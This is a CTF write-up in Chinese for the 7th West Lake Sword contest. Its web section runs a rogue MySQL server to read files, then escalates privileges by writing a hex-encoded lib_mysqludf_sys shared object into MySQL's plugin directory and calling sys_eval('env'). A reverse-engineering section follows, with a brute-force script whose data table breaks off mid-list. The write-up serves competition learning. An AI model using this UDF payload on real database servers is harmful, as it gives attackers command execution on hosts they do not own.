第七届西湖论剑网络安全技能大赛部分 WRITEUP By 关注济南皮蛋科技喵

WEB

onlysql

先用https://github.com/rmb122/rogue_mysql_server

读取query.php

有用户名和密码 直接连接

尝试从数据库中读取flag 发现读取不全

尝试提权

读取插件目录

SHOW VARIABLES LIKE 'plugin_dir';

使用udf提权

https://www.sqlsec.com/tools/udf.html

SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE '/usr/lib/mysql/p1ugin/udf.so';
create function sys_eval returns string soname "udf.so";
select sys_eval('env');

FLAG=DASCTF{52625923927102143534378049346624}

REVERSE

MZ

主要逻辑比较清楚,401020是一个初始化函数,434190是sha1,用来最后取唯一值

这里off_439000​的表值是在初始化中生成的,可以使用idapython​来直接计算,这里我是把它提取出来做的

直接爆破来解

import hashlib

lst = [ [5, 0x43f7d8], [2, 0x43e2e0], [0x14, 0x441e10], [0x15, 0x43e9d8], [0x2b, 0x440cb0], [0x76, 0x43cd70], [0x5f, 0x43ce58], [0xc, 0x43eac8], [0x5d, 0x43a438], [0x67, 0x43a950], [0xd, 0x440cf0], [0x45, 0x43d288], [0x6c, 0x440030], [0x4a, 0x43e7c0], [0x45, 0x4390e0], [0x20, 0x43c858], [0x50, 0x43bb88], [0x71, 0x43c410], [0x45, 0x43e4c0], [0x44, 0x43f0e0], [0x6a, 0x440a08], [0x50, 0x43d778], [0x1f, 0x43cf18], [0x36, 0x43cd68], [9, 0x43bea8], [0x56, 0x43e380], [0x28, 0x43ca70], [10, 0x43aa10], [0x35, 0x43daa8], [0x7d, 0x441930], [0x7d, 0x43ba98], [0x2b, 0x43b3d8], [1, 0x43c648], [0x59, 0x439d90], [0x31, 0x43cb20], [0x58, 0x439f70], [2, 0x440780], [0x62, 0x43b2e0], [0x15, 0x43f318], [0x32, 0x43f798], [0x67, 0x440648], [0x58, 0x4393a8], [0x1a, 0x43fec8], [0x62, 0x440d30], [0x3e, 0x43ff68], [0x3c, 0x441068], [99, 0x43ac38], [0x78, 0x43a988], [0x37, 0x43c898], [0x76, 0x43ace8], [0x69, 0x43c5c0], [0x5b, 0x43c238], [0x38, 0x439818], [0x17, 0x43a530], [0x4a, 0x442068], [0x4d, 0x43ad50], [0x5a, 0x440e98], [0x39, 0x43c180], [0x27, 0x43f278], [0x2b, 0x43c7f0], [0x3c, 0x440fa8], [0x7b, 0x43bf20], [0x34, 0x43bdc8], [0x30, 0x43f020], [0x48, 0x442bb8], [0x29, 0x4398d8], [0x65, 0x43ba50], [0x7a, 0x440d80], [0x37, 0x440b08], [0x7a, 0x43a2e0], [0x32, 0x43a2c0], [5, 0x43ac98], [0x27, 0x43a918], [0x70, 0x43da90], [0x79, 0x439d00], [100, 0x43bc88], [0x52, 0x43a4e8], [0x5d, 0x43fea0], [0x18, 0x43bdb8], [0x1f, 0x440c60], [0x6c, 0x4418a8], [0x7d, 0x43ce18], [5, 0x43b220], [0x58, 0x4393a8], [0x15, 0x43cfa0], [0x3f, 0x439538], [0x23, 0x4403d8], [0x75, 0x43cfe8], [0x7a, 0x43b688], [0x1f, 0x439798], [0x24, 0x43eaa0], [0x3f, 0x43e9c0], [8, 0x43ada8], [0x2b, 0x441ea0], [0x17, 0x43d310], [0x38, 0x43a310], [0x45, 0x43c7a8], [0x25, 0x439730], [0xc, 0x43fe28], [0x14, 0x43e180], [0x4d, 0x43ad98], [0x42, 0x43b0b8], [0x5e, 0x43b180], [0x6e, 0x4411c8], [0x6b, 0x43c6a8], [7, 0x4398c8], [0x24, 0x43bfd8], [0xd, 0x43d218], [0x4c, 0x43e8e8], [0x54, 0x43a968], [0x2a, 0x43e110], [0x1c, 0x43b170], [0x5d, 0x439e38], [0x7b, 0x43f758], [0x2c, 0x442028], [0x34, 0x43fe38], [0x46, 0x43b7f0], [7, 0x440dd8], [0x10, 0x440470], [0x5e, 0x440130], [0x79, 0x43a740], [0x1b, 0x43c638], [0x58, 0x441db0], [0x47, 0x43c508], [0x7a, 0x442168], [0x70, 0x43acf0], [0x2d, 0x43ddc0], [0xf, 0x43c5b8], [0x29, 0x43b458], [3, 0x43dcd8], [0x7a, 0x43e198], [0x41, 0x43a770], [0x47, 0x4392a8], [0x3d, 0x43f958], [0x46, 0x43d5a8], [0x5f, 0x441e70], [9, 0x439900], [0x6e, 0x43c798], [0x11, 0x43a6d8], [0x14, 0x43db98], [0x4f, 0x441a28], [0x43, 0x440440], [99, 0x43b050], [0x7e, 0x442a70], [0, 0x43a250], [0x62, 0x439828], [0x77, 0x442248], [0x31, 0x43bce0], [9, 0x43bc00], [0x36, 0x43cbc8], [0x78, 0x43e5a8], [0x33, 0x43f2b0], [0x67, 0x43d4f0], [0x43, 0x43d5b0], [0x7c, 0x43c7a0], [0x3d, 0x43f840], [0x71, 0x43d428], [0x33, 0x4417d0], [0x7d, 0x441090], [0, 0x43dc98], [0x24, 0x442050], [0x73, 0x43d5d0], [10, 0x442430], [0x22, 0x441690], [0x23, 0x43a700], [0x6f, 0x439d50], [0xe, 0x43dff0], [0x43, 0x43e7c0], [0x4c, 0x43bdd8], [0x7c, 0x441df8], [0x3a, 0x442a38], [0x36, 0x43d7c8], [0x75, 0x43c368], [0x51, 0x4402b0], [0xf, 0x43d2b0], [0x51, 0x43ac60], [0x41, 0x43b3a8], [0x2a, 0x43fe88], [2, 0x439290], [0x5c, 0x43b9c0], [0x1d, 0x442c58], [0xe, 0x441748], [0x49, 0x43fd80], [0x20, 0x43c6e0], [0x55, 0x43f7e8], [0x2c, 0x442670], [0x4a, 0x43deb0], [0x1d, 0x43f328], [0x51, 0x43ecf0], [0x55, 0x441a48], [0x13, 0x43b280], [0x58, 0x43a820], [0x68, 0x43c588], [0x2e, 0x43c658], [0x13, 0x440030], [0x50, 0x43f6e8], [0x61, 0x43ac10], [0x60, 0x4402e0], [0x60, 0x439758], [5, 0x43f408], [9, 0x440b70], [5, 0x4416e8], [0x17, 0x4396b8], [0x34, 0x43f0a8], [99, 0x43b1b0], [0x20, 0x43c6e8], [0x70, 0x43e230], [0x24, 0x440ec8], [0x12, 0x442880], [0x46, 0x43fdc0], [0x60, 0x43aec0], [0x14, 0x43bcd0], [0x44, 0x43f5b0], [0x74, 0x4396f0], [0x68, 0x43feb8], [0x52, 0x43cb80], [0x52, 0x43bea8], [0x69, 0x43fb10], [0x76, 0x43afa0], [0x65, 0x43a748], [0x75, 0x43c7b0], [0x3c, 0x442990], [0x74, 0x43b410], [0x65, 0x43f620], [0x24, 0x43a3c8], [0x66, 0x43b6b8], [0x70, 0x43ef48], [0x69, 0x43ffb0], [4, 0x441a28], [0x12, 0x43f3f8], [100, 0x43bf60], [0x11, 0x440208], [0xb, 0x43e708], [0x5c, 0x43f4e8], [0x20, 0x43b760], [0x46, 0x43df40], [0x38, 0x43fb38], [0x56, 0x43c2b8], [0x52, 0x43fa98], [0, 0x4422e0], [99, 0x43f358], [0x29, 0x441288], [0x30, 0x43b488], [0x34, 0x43a890], [0x40, 0x439d88], [0x54, 0x442c00], [0x3d, 0x43a318], [0x74, 0x43dd58], [0x70, 0x43c360], [0x10, 0x43b3f8], [0x3c, 0x439478], [0x11, 0x441350], [0x44, 0x4398b8], [0x4b, 0x43f368], [0x2a, 0x43d708], [0x73, 0x439450], [8, 0x440400], [0x51, 0x43a568], [0x77, 0x43d8c8], [9, 0x43dae8], [9, 0x43d0c0], [0xc, 0x439e68], [0x44, 0x43c890], [0x55, 0x43fbb0], [0x28, 0x4408e8], [0x59, 0x4425c0], [0x51, 0x43cba8], [0x2b, 0x441340], [0x17, 0x43ff80], [0x18, 0x43c1e0], [0, 0x43a520], [0x71, 0x43a5a8], [0x27, 0x441778], [0x49, 0x442720], [7, 0x43a938], [0x1a, 0x43d080], [0x4f, 0x43f620], [0x49, 0x43fa38], [0x32, 0x442c58], [0x36, 0x43f398], [0x40, 0x43b4a0], [0x33, 0x43bb78], [0x51, 0x43bbf0], [0x1e, 0x4399d0], [0x1a, 0x43aec8], [0x69, 0x439698], [0x3f, 0x43d360], [0x4e, 0x43ecb0], [0x44, 0x441140], [0x25, 0x439aa8], [4, 0x4414e8], [0x4c, 0x43b458], [0x71, 0x439e98], [0x4d, 0x43a0e8], [0x27, 0x43da20], [0x3e, 0x43f650], [0x2f, 0x439088], [0x4c, 0x43b360], [0x1d, 0x43b910], [0x1e, 0x43a978], [0x70, 0x43d4c8], [0xb, 0x43f050], [100, 0x4399c8], [6, 0x43c8a0], [0x4b, 0x4412d8], [0x1d, 0x439088], [0x7b, 0x43f248], [0x22, 0x43d168], [0x34, 0x43b038], [0x7a, 0x442b00], [0x67, 0x43c538], [0x42, 0x439490], [0x51, 0x43a120], [0x6a, 0x43e688], [0x72, 0x442988], [9, 0x43e680], [0x68, 0x4399d0], [0x76, 0x43f950], [0x37, 0x4417d8], [0x43, 0x4412c0], [0xc, 0x441480], [0x13, 0x43ca00], [99, 0x43ff68], [0x4f, 0x43c178], [0x42, 0x442738], [0x5f, 0x442938], [0x38, 0x43aa50], [0x37, 0x43dbe0], [0x6e, 0x4428e8], [0xc, 0x43ed98], [0, 0x43f798], [0x5e, 0x43bea8], [0x6b, 0x43abd8], [0x4f, 0x4419d8], [0x55, 0x43b850], [0x4c, 0x4413d0], [0x40, 0x43b038], [0x13, 0x440dc8], [0x2a, 0x440980], [0x29, 0x440f80], [0x2d, 0x43e3d8], [0x30, 0x43b018], [0x1b, 0x4405f8], [0x44, 0x43aa38], [0x34, 0x4408a0], [0x4a, 0x440328], [0x56, 0x439e80], [0x4a, 0x43f828], [0x5f, 0x43f5a0], [0x5d, 0x43bc20], [0x20, 0x4405f0], [0x1c, 0x439bc8], [0xe, 0x442b80], [0x50, 0x43c0e0], [5, 0x43aac8], [0x2f, 0x4391c8], [0x74, 0x441ed8], [0x45, 0x440160], [0x1b, 0x43b6e8], [0x2e, 0x43c1a0], [0x3a, 0x43a848], [0x6d, 0x43ef28], [0x70, 0x43e140], [0x25, 0x43a480], [0x23, 0x43aba8], [0xd, 0x43ce30], [0x10, 0x441c80], [0x4e, 0x43d330], [0x78, 0x43b6e0], [0x25, 0x440118], [0x2a, 0x440e90], [9, 0x43c048], [0x7a, 0x43ddf8], [0x29, 0x439cc8], [0x60, 0x43a4e0], [0x69, 0x441158], [0x7b, 0x43d220], [99, 0x442c18], [0x34, 0x43e260], [99, 0x43dab8], [0x10, 0x43b6b0], [0x7c, 0x440b00], [0x7e, 0x43c6b0], [0x29, 0x441d00], [0x79, 0x43ac88], [0x14, 0x43a218], [0x2d, 0x43f110], [8, 0x4407c8], [0xe, 0x43e338], [5, 0x43ad90], [0x7d, 0x440ca0], [0xe, 0x43d758], [0x5e, 0x441030], [0x45, 0x43cf40], [0x69, 0x439790], [0x2f, 0x4395d0], [0x65, 0x43bf38], [0x6a, 0x441198], [0x34, 0x43c408], [0x1a, 0x440d00], [0x6a, 0x439ba8], [0x47, 0x4401b8], [0x11, 0x43b048], [0x22, 0x439e80], [0x60, 0x43d498], [0x2c, 0x442c08], [0x67, 0x440520], [0x5e, 0x4424e0], [0x33, 0x43c328], [0x4e, 0x43e9a0], [0x45, 0x43fc20], [0x50, 0x43d640], [0x4a, 0x43d000], [0x3d, 0x4422b8], [0x5e, 0x439d90], [0x34, 0x439ca8], [1, 0x439750], [0x10, 0x43dd28], [0x3b, 0x4402b8], [0x77, 0x4405f8], [0xf, 0x43ec98], [0x1e, 0x441258], [5, 0x439a38], [0x45, 0x43dbb8], [0x30, 0x43d318], [0x65, 0x43d070], [0x61, 0x43ad00], [0x3c, 0x439150], [0x52, 0x43a648], [7, 0x43d798], [0xe, 0x439bf8], [0x38, 0x441e00], [0x74, 0x440268], [0x69, 0x4399a8], [0x7b, 0x43bb60], [0x4e, 0x43d270], [0x1c, 0x43b100], [0x7d, 0x4398d8], [0x19, 0x43cc50], [0x51, 0x43c1a0], [0x70, 0x43fb30], [0x1b, 0x43e1f8], [0x42, 0x43a980], [0xb, 0x43b0f8], [0x71, 0x43c8d8], [1, 0x43b100], [0x44, 0x43b390], [0xc, 0x43f5c8], [0x52, 0x43ef18], [0x79, 0x440940], [0x36, 0x43a078], [0x18, 0x43d2a0], [0x75, 0x440d40], [0x1a, 0x4424f8], [0x59, 0x43eab0], [0x3e, 0x43c990], [0x7c, 0x43ffc0], [0x25, 0x43c430], [0x50, 0x43ec90], [3, 0x43c100], [9, 0x43f8e0], [0xc, 0x43cde8], [100, 0x4394d0], [0x3b, 0x43d3f8], [0x17, 0x43a0d0], [7, 0x43b6b0], [0x7e, 0x4398d8], [0x6a, 0x43cd90], [0x73, 0x43eee0], [99, 0x4403b8], [0x5c, 0x43c158], [0x6b, 0x441750], [0x6d, 0x4417f8], [0x61, 0x4404a0], [0x79, 0x439d00], [0x10, 0x43f8a8], [99, 0x43efe8], [0x2d, 0x440d18], [0x3b, 0x43aff0], [0x79, 0x442150], [0x23, 0x43dee0], [5, 0x43a330], [0x6a, 0x43dbf0], [6, 0x439978], [0x44, 0x43caa8], [0x7a, 0x43a220], [0x24, 0x43a708], [0x66, 0x43a560], [0x14, 0x43b5a8], [0x59, 0x43ed00], [0x33, 0x43b048], [0x46, 0x4423a8], [0x2d, 0x4394b8], [0x19, 0x43dac8], [0x7e, 0x43ca40], [0x2a, 0x43b358], [0x3f, 0x43c900], [0xe, 0x43e2c0], [0x35, 0x43ae38], [0x54, 0x43c8e0], [0x19, 0x439588], [0x23, 0x43fe30], [0x1a, 0x43d308], [0x5c, 0x440ff8], [0x35, 0x43d1c8], [0x36, 0x440518], [0x61, 0x43dde8], [0x5e, 0x441d08], [0, 0x43dd48], [0x27, 0x43ac40], [0x4b, 0x43bbb8], [0x4d, 0x43dfd0], [0x1d, 0x43f570], [0x65, 0x43d130], [0x3b, 0x43adf8], [0x61, 0x442c40], [0x79, 0x441ed0], [0x46, 0x4399a0], [0xf, 0x43be08], [0x29, 0x43af98], [0x4b, 0x43ad18], [0x54, 0x441c68], [0x7b, 0x440c60], [0x3e, 0x43aac0], [0x5b, 0x439d50], [0x57, 0x43c9f8], [0x27, 0x43c598], [0x14, 0x439ab8], [0x5b, 0x4398a8], [0x76, 0x4418f0], [0x38, 0x43baf8], [0x65, 0x4417e0], [0x59, 0x4402b0], [0x7c, 0x43c338], [0x3a, 0x43c4d0], [0x4f, 0x43b388], [0x60, 0x43b918], [0x2e, 0x43c228], [0x75, 0x440bb0], [0x70, 0x43c9d0], [0x29, 0x4399e0], [0x51, 0x439ff8], [0x7c, 0x43d4a0], [0x52, 0x4397c0], [0x77, 0x43b438], [0x54, 0x43b980], [0x53, 0x43ebe8], [0x43, 0x43e200], [0x16, 0x441478], [0, 0x43c830], [0x3f, 0x441128], [0x74, 0x43a708], [0x6c, 0x43e788], [0x6a, 0x43f8a0], [0x28, 0x440458], [0x29, 0x43e408], [0x35, 0x43e330], [0x68, 0x440d40], [0x23, 0x43e850], [5, 0x440e80], [0x5d, 0x439158], [0x35, 0x439d68], [0x1e, 0x439918], [0x7e, 0x43bb18], [0x73, 0x43a160], [0x37, 0x43fed0], [0x28, 0x43dc00], [0x6d, 0x43c0d0], [0x50, 0x43dca8], [0x5a, 0x439c48], [0x58, 0x43ebd8], [0x44, 0x43fdd8], [0x3d, 0x442b38], [0x12, 0x43dbc8], [0x56, 0x4412e8], [0x54, 0x43b6a8], [0x5e, 0x43aa08], [1, 0x43e620], [0xe, 0x43e0b8], [0x48, 0x43e2e8], [0x1d, 0x43f8a8], [0x2e, 0x440510], [0x62, 0x43ba68], [0x35, 0x43bb68], [0x4e, 0x43f578], [0x72, 0x4398e8], [0x2e, 0x43b9b0], [0x45, 0x4406c0], [0x5f, 0x43fac8], [0x70, 0x442a98], [0x3e, 0x4422e8], [0xd, 0x43a3f8], [0x35, 0x440950], [0x3d, 0x43a3b0], [1, 0x439398], [0x7a, 0x43a240], [0x27, 0x4425d0], [0x18, 0x441ab8], [0x49, 0x43ecd8], [0x69, 0x43d888], [0x17, 0x439478], [0x51, 0x43b7f8], [0x3f, 0x441460], [0x54, 0x43b7c8], [0x20, 0x43c598], [0x4e, 0x439c68], [0x65, 0x43e8d8], [0x21, 0x43c100], [4, 0x43aee0], [0x20, 0x43d3d8], [0x3e, 0x439ef0], [0x10, 0x43be88], [0xe, 0x43b818], [0x52, 0x440d08], 